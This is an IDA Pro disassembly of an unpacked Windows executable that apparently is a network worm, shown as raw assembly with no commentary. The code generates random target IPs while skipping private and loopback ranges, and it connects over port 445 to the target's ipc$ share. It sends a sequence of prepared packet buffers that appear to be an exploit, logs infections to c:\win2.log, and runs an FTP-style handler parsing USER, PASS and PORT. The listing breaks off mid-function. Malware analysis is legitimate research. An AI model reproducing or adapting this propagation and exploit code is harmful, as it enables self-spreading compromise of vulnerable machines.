;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 0AAA417739C187E2DC2F7AEA9D0278CB
; File Name : u:\work\0aaa417739c187e2dc2f7aea9d0278cb_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40127D+7C�p
; sub_401F2E:loc_401F9B�p ...
mov eax, dword_406F40
imul eax, 343FDh
add eax, 279EC3h
mov dword_406F40, eax
shr eax, 10h
and eax, 7FFFh
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40101E proc near ; CODE XREF: sub_4020C8+1F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_406F40, eax
retn
sub_40101E endp
; =============== S U B R O U T I N E =======================================
sub_401028 proc near ; CODE XREF: sub_4020C8+24�p
var_190 = byte ptr -190h
sub esp, 190h
lea eax, [esp+190h+var_190]
push eax
push 101h
call dword_4050F0
add esp, 190h
retn
sub_401028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401045 proc near ; CODE XREF: sub_4010D2+4C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call dword_405120
movsx ecx, al
mov [ebp+arg_0], eax
movsx edx, byte ptr [ebp+arg_0+2]
movsx esi, byte ptr [ebp+arg_0+3]
movsx edi, ah
test ecx, ecx
mov eax, 100h
jge short loc_40106F
add ecx, eax
loc_40106F: ; CODE XREF: sub_401045+26�j
test edi, edi
jge short loc_401075
add edi, eax
loc_401075: ; CODE XREF: sub_401045+2C�j
test edx, edx
jge short loc_40107B
add edx, eax
loc_40107B: ; CODE XREF: sub_401045+32�j
test esi, esi
jge short loc_401081
add esi, eax
loc_401081: ; CODE XREF: sub_401045+38�j
push 1
cmp ecx, 7Fh
pop eax
jnz short loc_401095
test edi, edi
jnz short loc_4010CE
test edx, edx
jnz short loc_4010CE
cmp esi, eax
jz short loc_4010CC
loc_401095: ; CODE XREF: sub_401045+42�j
cmp ecx, 0Ah
jz short loc_4010CC
cmp ecx, 0ACh
jnz short loc_4010AC
cmp edi, 0Fh
jle short loc_4010CE
cmp edi, 20h
jl short loc_4010CC
loc_4010AC: ; CODE XREF: sub_401045+5B�j
cmp ecx, 0C0h
jnz short loc_4010BC
cmp edi, 0A8h
jz short loc_4010CC
loc_4010BC: ; CODE XREF: sub_401045+6D�j
cmp ecx, 0A9h
jnz short loc_4010CE
cmp edi, 0FEh
jnz short loc_4010CE
loc_4010CC: ; CODE XREF: sub_401045+4E�j
; sub_401045+53�j ...
xor al, al
loc_4010CE: ; CODE XREF: sub_401045+46�j
; sub_401045+4A�j ...
pop edi
pop esi
pop ebp
retn
sub_401045 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010D2 proc near ; CODE XREF: sub_40127D+9C�p
; sub_401F2E+39�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push ebx
push esi
push edi
lea eax, [ebp+var_100]
push 0FFh
push eax
call dword_405118
test eax, eax
jnz short loc_401136
lea eax, [ebp+var_100]
push eax
call dword_405124
mov edi, eax
xor esi, esi
cmp edi, esi
jz short loc_401136
mov eax, [edi+0Ch]
cmp [eax], esi
jz short loc_401136
loc_401110: ; CODE XREF: sub_4010D2+60�j
mov eax, [esi+eax]
push dword ptr [eax]
call dword_40511C
mov ebx, eax
push ebx
call sub_401045
test al, al
pop ecx
jnz short loc_40113D
mov eax, [edi+0Ch]
add esi, 4
cmp dword ptr [esi+eax], 0
jnz short loc_401110
jmp short loc_401139
; ---------------------------------------------------------------------------
loc_401136: ; CODE XREF: sub_4010D2+20�j
; sub_4010D2+35�j ...
mov ebx, [ebp+arg_0]
loc_401139: ; CODE XREF: sub_4010D2+62�j
test ebx, ebx
jz short loc_401140
loc_40113D: ; CODE XREF: sub_4010D2+54�j
push ebx
jmp short loc_401145
; ---------------------------------------------------------------------------
loc_401140: ; CODE XREF: sub_4010D2+69�j
push offset a127_0_0_1 ; "127.0.0.1"
loc_401145: ; CODE XREF: sub_4010D2+6C�j
push [ebp+arg_0]
call dword_405018 ; lstrcpyA
pop edi
pop esi
pop ebx
leave
retn
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401153 proc near ; CODE XREF: sub_401F2E+126�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_402250
add esp, 0Ch
mov [ebp+var_10], 2
push 1BDh
call dword_405108
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push 0
push eax
call sub_402250
add esp, 10h
push 6
push 1
pop ebx
push ebx
push 2
call dword_40510C
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4011B4
xor al, al
jmp short loc_4011D1
; ---------------------------------------------------------------------------
loc_4011B4: ; CODE XREF: sub_401153+5B�j
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_405110
cmp eax, 0FFFFFFFFh
jnz short loc_4011C8
xor bl, bl
loc_4011C8: ; CODE XREF: sub_401153+71�j
push esi
call dword_405114
mov al, bl
loc_4011D1: ; CODE XREF: sub_401153+5F�j
pop esi
pop ebx
leave
retn
sub_401153 endp
; =============== S U B R O U T I N E =======================================
sub_4011D5 proc near ; CODE XREF: sub_401153+30�p
; sub_40127D+34�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_405120
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4011F2
test esi, esi
jnz short loc_401204
cmp byte ptr [edi], 30h
jz short loc_40120B
loc_4011F2: ; CODE XREF: sub_4011D5+12�j
push edi
call dword_405124
test eax, eax
jz short loc_401204
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_401204: ; CODE XREF: sub_4011D5+16�j
; sub_4011D5+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_40120B
xor esi, esi
loc_40120B: ; CODE XREF: sub_4011D5+1B�j
; sub_4011D5+32�j
mov eax, esi
pop edi
pop esi
retn
sub_4011D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401210 proc near ; CODE XREF: sub_40127D+F9�p
var_14 = byte ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
inc dword_406F44
push edi
push dword_406F44
lea eax, [ebp+var_14]
push offset aI ; "%i"
push eax
call dword_4050E0 ; wsprintfA
add esp, 0Ch
push 0
push offset aCWin2_log ; "c:\\win2.log"
call dword_405024 ; _lcreat
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40127A
lea eax, [ebp+var_14]
push esi
push eax
call sub_4022B0
mov esi, dword_405020
pop ecx
push eax
lea eax, [ebp+var_14]
push eax
push edi
call esi ; dword_405020
push [ebp+arg_0]
call sub_4022B0
pop ecx
push eax
push [ebp+arg_0]
push edi
call esi ; dword_405020
push edi
call dword_40501C ; _lclose
pop esi
loc_40127A: ; CODE XREF: sub_401210+37�j
pop edi
leave
retn
sub_401210 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40127D proc near ; CODE XREF: sub_401A84+7B�p
var_348 = dword ptr -348h
var_33C = byte ptr -33Ch
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 33Ch
push ebx
push edi
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_402250
add esp, 0Ch
mov [ebp+var_10], 2
push 270Bh
call dword_405108
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push ebx
push eax
call sub_402250
add esp, 10h
push 6
push 1
push 2
call dword_40510C
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4012E2
xor al, al
jmp loc_401394
; ---------------------------------------------------------------------------
loc_4012E2: ; CODE XREF: sub_40127D+5C�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_405110
cmp eax, 0FFFFFFFFh
jz loc_40138B
push esi
call sub_401000
mov esi, eax
lea eax, [ebp+var_110]
push offset dword_406F48
push eax
call dword_405018 ; lstrcpyA
lea eax, [ebp+var_110]
push eax
call sub_4010D2
push esi
lea eax, [ebp+var_110]
push esi
push eax
push off_406030
lea eax, [ebp+var_33C]
push eax
call dword_4050E0 ; wsprintfA
lea eax, [ebp+var_33C]
xor esi, esi
push eax
call sub_4022B0
add esp, 1Ch
test eax, eax
jbe short loc_401373
loc_40134F: ; CODE XREF: sub_40127D+F4�j
push ebx
lea eax, [ebp+esi+var_33C]
push 1
push eax
push edi
call dword_405104
lea eax, [ebp+var_33C]
inc esi
push eax
call sub_4022B0
cmp esi, eax
pop ecx
jb short loc_40134F
loc_401373: ; CODE XREF: sub_40127D+D0�j
push [ebp+arg_0]
call sub_401210
mov [esp+348h+var_348], 3E8h
call dword_405028 ; Sleep
mov bl, 1
pop esi
loc_40138B: ; CODE XREF: sub_40127D+75�j
push edi
call dword_405114
mov al, bl
loc_401394: ; CODE XREF: sub_40127D+60�j
pop edi
pop ebx
leave
retn
sub_40127D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401398 proc near ; CODE XREF: sub_401A84+15�p
var_744 = byte ptr -744h
var_714 = byte ptr -714h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 744h
push ebx
push esi
push edi
push offset dword_406F48
push [ebp+arg_4]
call dword_405018 ; lstrcpyA
push [ebp+arg_0]
lea eax, [ebp+var_3C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050E0 ; wsprintfA
add esp, 0Ch
xor edi, edi
xor ecx, ecx
lea eax, [ebp+var_103]
loc_4013D1: ; CODE XREF: sub_401398+49�j
mov dl, [ebp+ecx+var_3C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4013D1
push 60h
lea eax, [ebp+var_B4]
push offset dword_4063E4
push eax
call sub_402330
lea eax, [ebp+var_3C]
push eax
call sub_4022B0
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_402330
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC+3)
push eax
call sub_4022B0
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_402330
lea eax, [ebp+var_3C]
push eax
call sub_4022B0
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_402330
lea eax, [ebp+var_3C]
push eax
call sub_4022B0
shl al, 1
add al, 9
push 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_87]
push eax
call sub_402330
add esp, 2Ch
push [ebp+arg_0]
call dword_405124
mov ebx, eax
cmp ebx, edi
jz loc_401554
push edi
push 1
push 2
loc_401495: ; DATA XREF: .text:off_4065D8�o
call dword_40510C
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_401554
push 1BDh
mov [ebp+var_14], 2
call dword_405108
mov [ebp+var_12], ax
mov eax, [ebx+0Ch]
push 8
push edi
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_C]
push eax
call sub_402250
add esp, 0Ch
lea eax, [ebp+var_14]
push 10h
push eax
push esi
call dword_405110
cmp eax, 0FFFFFFFFh
jz short loc_401554
mov ebx, dword_405104
push edi
push 89h
push offset dword_4061CC
push esi
call ebx ; dword_405104
cmp eax, 0FFFFFFFFh
jz short loc_401554
push edi
mov edi, 640h
lea eax, [ebp+var_744]
push edi
push eax
push esi
mov esi, dword_405100
call esi ; dword_405100
push 0
push 0A8h
push offset dword_406258
push [ebp+arg_0]
call ebx ; dword_405104
cmp eax, 0FFFFFFFFh
jz short loc_401554
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; dword_405100
push 0
push 0DEh
push offset dword_406304
push [ebp+arg_0]
call ebx ; dword_405104
cmp eax, 0FFFFFFFFh
jnz short loc_401558
loc_401554: ; CODE XREF: sub_401398+F2�j
; sub_401398+10B�j ...
xor eax, eax
jmp short loc_401599
; ---------------------------------------------------------------------------
loc_401558: ; CODE XREF: sub_401398+1BA�j
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; dword_405100
push 46h
lea esi, [ebp+var_714]
pop edi
loc_401570: ; CODE XREF: sub_401398+1F3�j
movsx eax, byte ptr [esi]
push eax
push [ebp+arg_4]
push offset aSC ; "%s%c"
push [ebp+arg_4]
call dword_4050E0 ; wsprintfA
add esp, 10h
inc esi
inc esi
dec edi
jnz short loc_401570
push [ebp+arg_0]
call dword_405114
push 1
pop eax
loc_401599: ; CODE XREF: sub_401398+1BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_401398 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40159E proc near ; CODE XREF: sub_401A84+3B�p
; sub_401A84+5E�p ...
var_89C4 = byte ptr -89C4h
var_895C = byte ptr -895Ch
var_68EC = byte ptr -68ECh
var_687C = byte ptr -687Ch
var_5DB8 = byte ptr -5DB8h
var_4814 = byte ptr -4814h
var_4813 = byte ptr -4813h
var_3780 = byte ptr -3780h
var_2CBC = byte ptr -2CBCh
var_2CBB = byte ptr -2CBBh
var_2CB8 = byte ptr -2CB8h
var_24D4 = byte ptr -24D4h
var_24C4 = byte ptr -24C4h
var_21A0 = byte ptr -21A0h
var_219C = byte ptr -219Ch
var_2190 = byte ptr -2190h
var_1F08 = byte ptr -1F08h
var_1E8C = byte ptr -1E8Ch
var_16BC = byte ptr -16BCh
var_1211 = byte ptr -1211h
var_F24 = byte ptr -0F24h
var_E84 = byte ptr -0E84h
var_778 = dword ptr -778h
var_768 = byte ptr -768h
var_754 = byte ptr -754h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_C4 = byte ptr -0C4h
var_C1 = byte ptr -0C1h
var_97 = byte ptr -97h
var_95 = byte ptr -95h
var_94 = byte ptr -94h
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 89C4h
call sub_402670
mov eax, dword_406A30
push [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, dword_406A34
mov [ebp+var_10], eax
lea eax, [ebp+var_4C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050E0 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_113]
loc_4015D8: ; CODE XREF: sub_40159E+4A�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4015D8
push ebx
push esi
push edi
push 60h
lea eax, [ebp+var_C4]
push offset dword_4063E4
push eax
call sub_402330
lea eax, [ebp+var_4C]
push eax
call sub_4022B0
shl eax, 1
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_94]
push eax
call sub_402330
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_4022B0
pop ecx
lea eax, [ebp+eax*2+var_95]
push eax
call sub_402330
lea eax, [ebp+var_4C]
push eax
call sub_4022B0
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_C1]
push eax
call sub_402330
lea eax, [ebp+var_4C]
push eax
call sub_4022B0
shl al, 1
add al, 9
push 1
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_97]
push eax
call sub_402330
add esp, 2Ch
push 270Bh
call dword_405108
xor eax, 9999h
push 2
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push offset dword_4060E4
call sub_402330
mov ebx, [ebp+arg_4]
add esp, 0Ch
cmp ebx, 1
jz short loc_40171A
cmp ebx, 2
jz short loc_40171A
push 7D0h
lea eax, [ebp+var_F24]
push 90h
push eax
call sub_402250
mov esi, offset loc_406034
push esi
call sub_4022B0
push eax
lea eax, [ebp+var_E84]
push esi
push eax
call sub_402330
lea eax, [ebp+var_14]
push eax
call sub_4022B0
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_768]
push eax
call sub_402330
add esp, 2Ch
imul ebx, 3Ch
mov eax, dword_406810[ebx]
mov [ebp+var_778], eax
jmp loc_4017EE
; ---------------------------------------------------------------------------
loc_40171A: ; CODE XREF: sub_40159E+115�j
; sub_40159E+11A�j
mov edi, 0DACh
lea eax, [ebp+var_2CB8]
push edi
push 90h
push eax
call sub_402250
imul ebx, 3Ch
push 4
lea eax, [ebp+var_24D4]
lea ebx, dword_406810[ebx]
push ebx
push eax
call sub_402330
mov esi, offset loc_406034
push esi
call sub_4022B0
push eax
lea eax, [ebp+var_24C4]
push esi
push eax
call sub_402330
push 4
lea eax, [ebp+var_21A0]
push offset dword_406A28
push eax
call sub_402330
push 4
lea eax, [ebp+var_219C]
push ebx
push eax
call sub_402330
add esp, 40h
push esi
call sub_4022B0
push eax
lea eax, [ebp+var_2190]
push esi
push eax
call sub_402330
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4813]
loc_4017A6: ; CODE XREF: sub_40159E+21A�j
mov dl, [ebp+ecx+var_2CB8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, edi
jl short loc_4017A6
and [ebp+var_2CBC], 0
and [ebp+var_2CBB], 0
mov esi, 1C52h
lea eax, [ebp+var_89C4]
push esi
push 31h
push eax
call sub_402250
push esi
lea eax, [ebp+var_68EC]
push 31h
push eax
call sub_402250
add esp, 18h
loc_4017EE: ; CODE XREF: sub_40159E+177�j
push 0
push 1
push 2
call dword_40510C
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_401A7D
push 1BDh
mov [ebp+var_24], 2
call dword_405108
push [ebp+arg_0]
mov [ebp+var_22], ax
call sub_4011D5
mov [ebp+var_20], eax
xor ebx, ebx
push 8
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_402250
add esp, 10h
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call dword_405110
cmp eax, 0FFFFFFFFh
jz loc_401A7D
mov esi, dword_405104
push ebx
push 89h
push offset dword_4061CC
push edi
call esi ; dword_405104
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push ebx
mov ebx, 640h
lea eax, [ebp+var_754]
push ebx
push eax
push edi
mov edi, dword_405100
call edi ; dword_405100
push 0
push 0A8h
push offset dword_406258
push [ebp+var_4]
call esi ; dword_405104
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405100
push 0
push 0DEh
push offset dword_406304
push [ebp+var_4]
call esi ; dword_405104
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405100
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_C4]
push eax
push [ebp+var_4]
call esi ; dword_405104
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405100
push 0
push 68h
push offset dword_406448
push [ebp+var_4]
call esi ; dword_405104
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405100
push 0
push 0A0h
push offset dword_4064B4
push [ebp+var_4]
call esi ; dword_405104
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405100
cmp [ebp+arg_4], 1
jz short loc_4019BB
cmp [ebp+arg_4], 2
jz short loc_4019BB
push 7Ch
lea eax, [ebp+var_1F08]
push offset dword_406558
push eax
call sub_402330
lea eax, [ebp+var_F24]
push 7D0h
push eax
lea eax, [ebp+var_1E8C]
push eax
call sub_402330
push 90h
lea eax, [ebp+var_16BC]
push offset off_4065D8
push eax
call sub_402330
add esp, 24h
and [ebp+var_1211], 0
lea eax, [ebp+var_1F08]
push 0
push 0CF8h
jmp loc_401A5E
; ---------------------------------------------------------------------------
loc_4019BB: ; CODE XREF: sub_40159E+3B8�j
; sub_40159E+3BE�j
push 68h
lea eax, [ebp+var_89C4]
push offset dword_40666C
push eax
call sub_402330
lea eax, [ebp+var_4814]
push 1B5Ah
push eax
lea eax, [ebp+var_895C]
push eax
call sub_402330
push 70h
lea eax, [ebp+var_68EC]
push offset dword_4066D8
push eax
call sub_402330
lea eax, [ebp+var_3780]
push 0A5Eh
push eax
lea eax, [ebp+var_687C]
push eax
call sub_402330
push 84h
lea eax, [ebp+var_5DB8]
push offset dword_40674C
push eax
call sub_402330
add esp, 3Ch
lea eax, [ebp+var_89C4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call esi ; dword_405104
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405100
push 0
push 0FDCh
lea eax, [ebp+var_68EC]
loc_401A5E: ; CODE XREF: sub_40159E+418�j
push eax
push [ebp+var_4]
call esi ; dword_405104
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 3E8h
call dword_405028 ; Sleep
push [ebp+var_4]
call dword_405114
loc_401A7D: ; CODE XREF: sub_40159E+264�j
; sub_40159E+2AB�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_40159E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A84 proc near ; CODE XREF: sub_4020C8+3A�p
var_84 = byte ptr -84h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_84]
push eax
push esi
call sub_401398
pop ecx
cmp eax, 1
pop ecx
jnz short loc_401B05
lea eax, [ebp+var_84]
push offset dword_406A3C
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz short loc_401AC8
push 0
push esi
call sub_40159E
push 0
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AC8: ; CODE XREF: sub_401A84+36�j
lea eax, [ebp+var_84]
push offset dword_406A38
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz short loc_401AEB
push 1
push esi
call sub_40159E
push 1
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AEB: ; CODE XREF: sub_401A84+59�j
push 2
push esi
call sub_40159E
push 2
loc_401AF5: ; CODE XREF: sub_401A84+42�j
; sub_401A84+65�j
push esi
call sub_40159E
add esp, 10h
push esi
call sub_40127D
pop ecx
loc_401B05: ; CODE XREF: sub_401A84+1F�j
pop esi
leave
retn
sub_401A84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B08 proc near ; CODE XREF: sub_401F2E+115�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push esi
call sub_404D52
push [ebp+arg_4]
mov esi, eax
lea eax, [ebp+var_24]
or [ebp+var_1C], 0FFFFFFFFh
push 24h
push eax
xor eax, eax
push eax
push eax
push eax
push [ebp+arg_0]
push esi
call sub_404D4C
test eax, eax
jnz short loc_401B3A
or eax, 0FFFFFFFFh
jmp short loc_401B43
; ---------------------------------------------------------------------------
loc_401B3A: ; CODE XREF: sub_401B08+2B�j
push esi
call sub_404D46
mov eax, [ebp+var_1C]
loc_401B43: ; CODE XREF: sub_401B08+30�j
pop esi
leave
retn
sub_401B08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B46 proc near ; DATA XREF: sub_401EA3+74�o
var_8E4 = byte ptr -8E4h
var_4E4 = byte ptr -4E4h
var_4E0 = byte ptr -4E0h
var_E4 = byte ptr -0E4h
var_60 = byte ptr -60h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8E4h
push ebx
mov ebx, [ebp+arg_0]
cmp ebx, 0FFFFFFFFh
jz loc_401E67
push esi
push edi
push 0
push off_4068D0
call sub_4022B0
mov esi, dword_405104
pop ecx
push eax
push off_4068D0
push ebx
call esi ; dword_405104
mov edi, [ebp+arg_0]
jmp short loc_401B84
; ---------------------------------------------------------------------------
loc_401B81: ; CODE XREF: sub_401B46+310�j
mov ebx, [ebp+arg_0]
loc_401B84: ; CODE XREF: sub_401B46+39�j
push 0
lea eax, [ebp+var_4E4]
push 400h
push eax
push ebx
call dword_405100
and [ebp+eax+var_4E4], 0
mov [ebp+var_10], eax
lea eax, [ebp+var_4E4]
push offset aUser ; "USER"
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz short loc_401BD5
push 0
push off_4068D4
call sub_4022B0
pop ecx
push eax
push off_4068D4
jmp loc_401E4F
; ---------------------------------------------------------------------------
loc_401BD5: ; CODE XREF: sub_401B46+73�j
lea eax, [ebp+var_4E4]
push offset aPass ; "PASS"
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz short loc_401C06
push 0
push off_4068D8
call sub_4022B0
pop ecx
push eax
push off_4068D8
jmp loc_401E4F
; ---------------------------------------------------------------------------
loc_401C06: ; CODE XREF: sub_401B46+A4�j
lea eax, [ebp+var_4E4]
push offset aPort ; "PORT"
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz loc_401CE2
lea eax, [ebp+var_4E0]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_4027C0
mov ax, word_406A5C
mov [ebp+var_4], ax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402720
add esp, 10h
mov ebx, eax
xor edi, edi
loc_401C55: ; CODE XREF: sub_401B46+159�j
test ebx, ebx
jz short loc_401C89
cmp edi, 4
jge short loc_401C6C
push ebx
call sub_401E6E
pop ecx
mov [ebp+edi*4+var_38], eax
cmp edi, 4
loc_401C6C: ; CODE XREF: sub_401B46+116�j
jnz short loc_401C78
push ebx
call sub_401E6E
pop ecx
mov [ebp+var_18], eax
loc_401C78: ; CODE XREF: sub_401B46:loc_401C6C�j
cmp edi, 5
jnz short loc_401C8C
push ebx
call sub_401E6E
pop ecx
mov [ebp+var_14], eax
jmp short loc_401C8C
; ---------------------------------------------------------------------------
loc_401C89: ; CODE XREF: sub_401B46+111�j
push 6
pop edi
loc_401C8C: ; CODE XREF: sub_401B46+135�j
; sub_401B46+141�j
lea eax, [ebp+var_4]
push eax
push 0
call sub_402720
inc edi
pop ecx
cmp edi, 6
pop ecx
mov ebx, eax
jl short loc_401C55
push [ebp+var_2C]
mov edi, [ebp+var_18]
lea eax, [ebp+var_60]
push [ebp+var_30]
shl edi, 8
push [ebp+var_34]
add edi, [ebp+var_14]
push [ebp+var_38]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call dword_4050E0 ; wsprintfA
add esp, 18h
push 0
push off_4068E0
call sub_4022B0
pop ecx
